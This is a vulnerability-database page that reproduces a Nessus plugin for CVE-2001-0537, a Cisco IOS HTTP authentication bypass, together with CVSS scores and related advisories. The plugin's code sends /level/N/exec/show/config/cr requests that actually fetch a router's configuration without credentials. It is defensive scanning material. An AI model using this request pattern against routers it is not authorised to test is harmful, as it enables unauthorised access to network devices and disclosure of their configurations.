Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
nessusThis script is Copyright (C) 2001-2018 Tenable Network Security, Inc.CISCO_HTTP_ADMIN_ACCESS.NASL
HistoryJul 02, 2001 - 12:00 a.m.

Cisco IOS HTTP Configuration Unauthorized Administrative Access

2001-07-0200:00:00
This script is Copyright (C) 2001-2018 Tenable Network Security, Inc.
www.tenable.com
65

9.3 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:M/Au:N/C:C/I:C/A:C

0.877 High

EPSS

Percentile

98.7%

JSON

It is possible to execute arbitrary commands on the remote Cisco router. An attacker may leverage this issue to disable network access via this device or lock legitimate users out of the router.

#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if(description)
{
 script_id(10700);
 script_version ("1.38");
 script_cve_id("CVE-2001-0537");
 script_bugtraq_id(2936);

 script_name(english:"Cisco IOS HTTP Configuration Unauthorized Administrative Access");
 
 script_set_attribute(attribute:"synopsis", value:
"The remote router allows authentication to be bypassed and arbitrary 
commands to be executed." );
 script_set_attribute(attribute:"description", value:
"It is possible to execute arbitrary commands on the remote Cisco
router.  An attacker may leverage this issue to disable network access
via this device or lock legitimate users out of the router." );
  # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20010627-ios-http-level
 script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?dba2bf4f" );
 script_set_attribute(attribute:"solution", value:
"Disable the web configuration interface completely." );
  script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
script_cwe_id(287);
 script_set_attribute(attribute:"plugin_publication_date", value: "2001/07/02");
 script_cvs_date("Date: 2018/11/15 20:50:20");
 script_set_attribute(attribute:"vuln_publication_date", value: "2001/06/27");
 script_set_attribute(attribute:"patch_publication_date", value: "2001/06/27");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe",value:"cpe:/o:cisco:ios");
script_set_attribute(attribute:"exploited_by_nessus", value:"true");
  script_end_attributes();
 
 script_summary(english:"Obtains the remote router configuration");
 script_category(ACT_GATHER_INFO);
 script_copyright(english:"This script is Copyright (C) 2001-2018 Tenable Network Security, Inc.");
 script_family(english:"CISCO");
 script_dependencie("http_version.nasl");
 script_require_ports("Services/www", 80);
 exit(0);
}

#

include("global_settings.inc");
include("misc_func.inc");
include("http.inc");

port = get_http_port(default:80);
kb   = get_kb_item("www/no404/" + port);

banner = get_http_banner(port:port);
if ( ! banner ) exit(0);
if ( "cisco-IOS" >!< banner && !egrep(pattern:"level [0-9]+ access", string:banner)) exit(0);
 

if ( ! isnull(kb) ) exit(0);

if(get_port_state(port))
{
  for(i=16;i<100;i=i+1)
  {
    url = string("/level/", i, "/exec/show/config/cr");
    res = http_send_recv3(method:"GET", item:url, port:port);
    if (isnull(res)) exit(0);

    if (
      "enable" >< res[2] &&
      "interface" >< res[2] &&
      "ip address" >< res[2]
    )
    {
      info = string(
        "\n",
        "Nessus was able to execute a command on the remote Cisco router and\n",
        "retrieve its configuration file using the following URL :\n",
        "\n",
        "  ", build_url(port:port, qs:url), "\n",
        "\n",
        "Here are its contents :\n",
        "\n",
        res[2]
      );
      security_hole(port:port, extra:info);
      exit(0);
    }
  }
}
VendorProductVersionCPE
ciscoioscpe:/o:cisco:ios

Related

saint 4
nessus 1
cert 1
cisco 1
nvd 1
checkpoint_advisories 1
nuclei 1
cvelist 1
cve 1
saint
saint
Cisco IOS HTTP access level authentication bypass
2010-12-23 00:00:00
Cisco IOS HTTP access level authentication bypass
2010-12-23 00:00:00
Cisco IOS HTTP access level authentication bypass
2010-12-23 00:00:00
nessus
nessus
IOS HTTP Authorization Vulnerability - Cisco Systems
2010-09-01 00:00:00
cert
cert
Cisco IOS HTTP server authentication vulnerability allows remote attackers to execute arbitrary commands
2001-06-27 00:00:00
cisco
cisco
IOS HTTP Authorization Vulnerability
2001-06-27 15:00:00
nvd
nvd
CVE-2001-0537
2001-07-21 04:00:00
checkpoint_advisories
checkpoint_advisories
Cisco IOS HTTP Authentication Bypass - Ver2 (CVE-2001-0537)
2014-03-03 00:00:00
nuclei
nuclei
Cisco IOS HTTP Configuration - Authentication Bypass
2023-06-12 12:36:50
cvelist
cvelist
CVE-2001-0537
2002-03-09 05:00:00
cve
cve
CVE-2001-0537
2002-03-09 05:00:00

9.3 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:M/Au:N/C:C/I:C/A:C

0.877 High

EPSS

Percentile

98.7%

JSON
Related for CISCO_HTTP_ADMIN_ACCESS.NASL
saint4nessus1cert1cisco1nvd1checkpoint_advisories1nuclei1cvelist1cve1